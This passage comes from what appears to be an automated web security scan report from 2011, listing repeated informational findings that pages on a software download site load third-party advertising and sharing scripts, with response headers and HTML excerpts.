<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1424. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1425. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:36 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1426. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1427. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1428. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1429. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:19 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1430. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1431. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1432. http://www.x64bitdownload.com/contact.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/contact.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1433. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:47 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 24883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1434. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1435. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1436. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1437. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1438. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1439. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1440. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1441. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
